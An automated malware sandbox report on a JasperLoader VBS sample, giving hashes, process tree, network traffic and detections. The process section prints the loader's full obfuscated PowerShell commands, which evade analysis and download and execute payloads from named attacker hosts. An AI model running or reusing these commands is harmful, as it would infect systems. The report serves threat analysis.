analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

IT39726519376166852192852505297.vbs

Full analysis: https://app.any.run/tasks/6055cf0a-4464-437b-89b1-390ea53e774c
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: April 15, 2019, 13:59:26
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
jasper
trojan
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF, LF line terminators
MD5:

B23E8069140FF4C39AB6E4894D53399B

SHA1:

169C45E65F8837C82991C320D047981BF4ABC8D6

SHA256:

16415454DAAFFDA0BA1A8E10EBAB77EC20F20059858DA2F59EED8E76046ADEC7

SSDEEP:

384:plAnrxj9nIA0bie+aCAEd4H9xahIkVjM1PxEwD3gTnYB1+HDROX8C21msMTfg7RS:EErVf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • JASPER was detected

      • powershell.exe (PID: 3240)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 1356)
      • powershell.exe (PID: 2800)
      • powershell.exe (PID: 3240)
    • Executes application which crashes

      • powershell.exe (PID: 1356)
    • Executes PowerShell scripts

      • WScript.exe (PID: 2520)
      • WScript.exe (PID: 2424)
    • Executes scripts

      • powershell.exe (PID: 2800)
  • INFO

    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 2800)
      • powershell.exe (PID: 1356)
    • Application launched itself

      • RdrCEF.exe (PID: 2104)
      • AcroRd32.exe (PID: 2348)
      • AcroRd32.exe (PID: 3044)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
55
Monitored processes
17
Malicious processes
2
Suspicious processes
3

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe powershell.exe ntvdm.exe no specs wscript.exe no specs acrord32.exe no specs #JASPER powershell.exe acrord32.exe no specs rdrcef.exe no specs rdrcef.exe no specs acrord32.exe no specs acrord32.exe no specs rdrcef.exe no specs rdrcef.exe no specs explorer.exe no specs PhotoViewer.dll no specs taskmgr.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2520"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\IT39726519376166852192852505297.vbs"C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
1356powershell -WindowStyle Hidden -Command $a='';105,102,40,32,40,40,71,101,116,45,85,73,67,117,108,116,117,114,101,41,46,78,97,109,101,32,45,109,97,116,99,104,32,39,82,85,124,85,65,124,66,89,124,67,78,39,41,32,45,111,114,32,40,40,71,101,116,45,87,109,105,79,98,106,101,99,116,32,45,99,108,97,115,115,32,87,105,110,51,50,95,67,111,109,112,117,116,101,114,83,121,115,116,101,109,32,45,80,114,111,112,101,114,116,121,32,77,111,100,101,108,41,46,77,111,100,101,108,32,45,109,97,116,99,104,32,39,86,105,114,116,117,97,108,66,111,120,124,86,77,119,97,114,101,124,75,86,77,39,41,32,41,123,32,101,120,105,116,59,32,125,59,36,105,119,102,115,115,122,102,32,61,32,91,83,121,115,116,101,109,46,73,79,46,80,97,116,104,93,58,58,71,101,116,84,101,109,112,80,97,116,104,40,41,59,36,100,102,119,118,120,101,105,32,61,32,74,111,105,110,45,80,97,116,104,32,36,105,119,102,115,115,122,102,32,39,74,117,99,104,101,99,107,120,54,52,46,101,120,101,39,59,36,121,117,116,97,115,32,61,32,39,104,116,116,112,58,47,47,105,116,46,101,109,101,114,97,108,100,115,117,114,102,115,99,105,101,110,99,101,115,46,105,110,102,111,47,97,112,105,63,118,97,105,121,98,117,39,59,36,122,103,116,106,32,61,32,74,111,105,110,45,80,97,116,104,32,36,105,119,102,115,115,122,102,32,39,83,101,97,114,99,104,73,51,50,46,106,115,39,59,36,122,117,116,121,32,61,32,39,104,116,116,112,58,47,47,105,109,103,46,101,115,115,45,105,100,46,99,111,109,47,108,50,46,112,104,112,63,118,105,100,61,112,101,99,55,39,59,36,103,120,121,116,105,32,61,32,74,111,105,110,45,80,97,116,104,32,36,105,119,102,115,115,122,102,32,39,104,106,102,102,122,100,46,112,100,102,39,59,36,101,103,116,104,106,120,122,32,61,32,39,104,116,116,112,58,47,47,105,109,103,46,101,115,115,45,105,100,46,99,111,109,47,108,50,46,112,104,112,63,118,105,100,61,112,101,99,55,39,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,36,101,103,116,104,106,120,122,44,36,122,103,116,106,41,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,122,103,116,106,59,125,99,97,116,99,104,123,125,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,36,121,117,116,97,115,44,36,100,102,119,118,120,101,105,41,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,100,102,119,118,120,101,105,59,125,99,97,116,99,104,123,125,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,36,122,117,116,121,44,36,103,120,121,116,105,41,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,103,120,121,116,105,59,125,99,97,116,99,104,123,125,59|%{$a+=[char]$_};iex $a;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2800"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command $a='';105,102,40,32,40,40,71,101,116,45,85,73,67,117,108,116,117,114,101,41,46,78,97,109,101,32,45,109,97,116,99,104,32,39,82,85,124,85,65,124,66,89,124,67,78,39,41,32,45,111,114,32,40,40,71,101,116,45,87,109,105,79,98,106,101,99,116,32,45,99,108,97,115,115,32,87,105,110,51,50,95,67,111,109,112,117,116,101,114,83,121,115,116,101,109,32,45,80,114,111,112,101,114,116,121,32,77,111,100,101,108,41,46,77,111,100,101,108,32,45,109,97,116,99,104,32,39,86,105,114,116,117,97,108,66,111,120,124,86,77,119,97,114,101,124,75,86,77,39,41,32,41,123,32,101,120,105,116,59,32,125,59,36,105,119,102,115,115,122,102,32,61,32,91,83,121,115,116,101,109,46,73,79,46,80,97,116,104,93,58,58,71,101,116,84,101,109,112,80,97,116,104,40,41,59,36,100,102,119,118,120,101,105,32,61,32,74,111,105,110,45,80,97,116,104,32,36,105,119,102,115,115,122,102,32,39,74,117,99,104,101,99,107,120,54,52,46,101,120,101,39,59,36,121,117,116,97,115,32,61,32,39,104,116,116,112,58,47,47,105,116,46,101,109,101,114,97,108,100,115,117,114,102,115,99,105,101,110,99,101,115,46,105,110,102,111,47,97,112,105,63,118,97,105,121,98,117,39,59,36,122,103,116,106,32,61,32,74,111,105,110,45,80,97,116,104,32,36,105,119,102,115,115,122,102,32,39,83,101,97,114,99,104,73,51,50,46,106,115,39,59,36,122,117,116,121,32,61,32,39,104,116,116,112,58,47,47,105,109,103,46,101,115,115,45,105,100,46,99,111,109,47,108,50,46,112,104,112,63,118,105,100,61,112,101,99,55,39,59,36,103,120,121,116,105,32,61,32,74,111,105,110,45,80,97,116,104,32,36,105,119,102,115,115,122,102,32,39,104,106,102,102,122,100,46,112,100,102,39,59,36,101,103,116,104,106,120,122,32,61,32,39,104,116,116,112,58,47,47,105,109,103,46,101,115,115,45,105,100,46,99,111,109,47,108,50,46,112,104,112,63,118,105,100,61,112,101,99,55,39,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,36,101,103,116,104,106,120,122,44,36,122,103,116,106,41,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,122,103,116,106,59,125,99,97,116,99,104,123,125,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,36,121,117,116,97,115,44,36,100,102,119,118,120,101,105,41,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,100,102,119,118,120,101,105,59,125,99,97,116,99,104,123,125,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,36,122,117,116,121,44,36,103,120,121,116,105,41,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,103,120,121,116,105,59,125,99,97,116,99,104,123,125,59|%{$a+=[char]$_};iex $a;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2280"C:\Windows\system32\ntvdm.exe" -i1 C:\Windows\system32\ntvdm.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
NTVDM.EXE
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2424"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\SearchI32.js" C:\Windows\System32\WScript.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2348"C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\admin\AppData\Local\Temp\hjffzd.pdf"C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exepowershell.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
MEDIUM
Description:
Adobe Acrobat Reader DC
Exit code:
1
Version:
15.23.20070.215641
3240"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" if( (Get-UICulture).Name -match 'RU|UA|BY|CN'){ exit; };$avgvjts = [System.IO.Path]::GetTempPath();$sifehsjwwswvft = Join-Path $avgvjts 'SearchI32.txt';$ucjavjggvuawgsczezzczjzjs='http://green.dddownhole.com/cryptbody2.php';$vxwbfwxcyfyyafy = Join-Path $avgvjts 'SearchI32.js';$xsjjxfhgsyfef='http://green.dddownhole.com/loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php';$hvbsdjievfudheef = '';$cadjvcy='(NeRytCCWSw-ORytCCWSbject RytCCWSNet.WebCRytCCWSlienRytCCWSt).DRytCCWSownloadRytCCWSFRytCCWSile($ucjavjgRytCCWSgvuaRytCCWSwgsczeRytCCWSzzczjzjs,$sifRytCCWSehsjwwswvft);' -replace 'RytCCWS','';iex $cadjvcy;$vteaeddbxbjhwydubsyuid='(Ne3uS6aRvw-O3uS6aRvbje3uS6aRvct3uS6aRv Ne3uS6aRvt.WebCl3uS6aRvi3uS6aRve3uS6aRvnt)3uS6aRv.Downloa3uS6aRvdFil3uS6aRve($xsjj3uS6aRvx3uS6aRvfh3uS6aRvgsyf3uS6aRvef,$vxwbf3uS6aRvwx3uS6aRvc3uS6aRvyfyya3uS6aRvfy)3uS6aRv;' -replace '3uS6aRv','';iex $vteaeddbxbjhwydubsyuid;Get-Content $sifehsjwwswvft | Where-Object {$_ -match $regex} | ForEach-Object { $hvbsdjievfudheef += $_ -replace '..(.)','$1'};iex $hvbsdjievfudheef;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1008"C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --type=renderer "C:\Users\admin\AppData\Local\Temp\hjffzd.pdf"C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeAcroRd32.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe Acrobat Reader DC
Exit code:
1
Version:
15.23.20070.215641
2104"C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16448250C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeAcroRd32.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
MEDIUM
Description:
Adobe RdrCEF
Exit code:
3221225547
Version:
15.23.20053.211670
3696"C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-3d-apis --disable-databases --disable-direct-npapi-requests --disable-file-system --disable-notifications --disable-shared-workers --disable-direct-write --lang=en-US --lang=en-US --log-severity=disable --product-version="ReaderServices/15.23.20053 Chrome/45.0.2454.85" --device-scale-factor=1 --enable-delegated-renderer --num-raster-threads=2 --gpu-rasterization-msaa-sample-count=8 --content-image-texture-target=3553 --video-image-texture-target=3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel="2104.0.891568607\1009154636" --allow-no-sandbox-job /prefetch:673131151C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeRdrCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe RdrCEF
Exit code:
0
Version:
15.23.20053.211670
Total events
1 709
Read events
1 422
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
12
Text files
5
Unknown types
7

Dropped files

PID
Process
Filename
Type
1356powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\46Q13BOR6XMYJBHPGPTY.temp
MD5:
SHA256:
2800powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZHE9JBHF5D6PXJJESSUM.temp
MD5:
SHA256:
2280ntvdm.exeC:\Users\admin\AppData\Local\Temp\scs69B8.tmp
MD5:
SHA256:
2280ntvdm.exeC:\Users\admin\AppData\Local\Temp\scs69C9.tmp
MD5:
SHA256:
3240powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NCYUUL6CUIWM9ZFOCK76.temp
MD5:
SHA256:
1008AcroRd32.exeC:\Users\admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
MD5:
SHA256:
1008AcroRd32.exeC:\Users\admin\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt16.lst.1008
MD5:
SHA256:
1008AcroRd32.exeC:\Users\admin\AppData\Local\Adobe\Acrobat\DC\AdobeFnt16.lst.1008
MD5:
SHA256:
1248AcroRd32.exeC:\Users\admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
MD5:
SHA256:
2800powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
6
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1356
powershell.exe
GET
200
185.158.251.243:80
http://img.ess-id.com/l2.php?vid=pec7
NL
text
23.3 Kb
malicious
2800
powershell.exe
GET
200
185.158.251.243:80
http://img.ess-id.com/l2.php?vid=pec7
NL
text
17.7 Kb
malicious
2800
powershell.exe
GET
200
185.158.251.243:80
http://img.ess-id.com/l2.php?vid=pec7
NL
text
30.1 Kb
malicious
1356
powershell.exe
GET
200
185.158.249.151:80
http://it.emeraldsurfsciences.info/api?vaiybu
NL
text
4 b
suspicious
3240
powershell.exe
GET
200
185.158.251.243:80
http://green.dddownhole.com/loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php
NL
text
15.6 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2800
powershell.exe
185.158.251.243:80
img.ess-id.com
23media GmbH
NL
suspicious
1356
powershell.exe
185.158.251.243:80
img.ess-id.com
23media GmbH
NL
suspicious
2800
powershell.exe
185.158.249.151:80
it.emeraldsurfsciences.info
easystores GmbH
NL
suspicious
1356
powershell.exe
185.158.249.151:80
it.emeraldsurfsciences.info
easystores GmbH
NL
suspicious
3240
powershell.exe
185.158.251.243:80
img.ess-id.com
23media GmbH
NL
suspicious

DNS requests

Domain
IP
Reputation
img.ess-id.com
  • 185.158.251.243
malicious
it.emeraldsurfsciences.info
  • 185.158.249.151
suspicious
green.dddownhole.com
  • 185.158.251.243
malicious

Threats

PID
Process
Class
Message
2800
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan-Downloader.Script.Generic (JasperLoader)
1356
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan-Downloader.Script.Generic (JasperLoader)
2800
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan-Downloader.Script.Generic (JasperLoader)
3240
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan-Downloader.Script.Generic (JasperLoader)
1 ETPRO signatures available at the full report
No debug info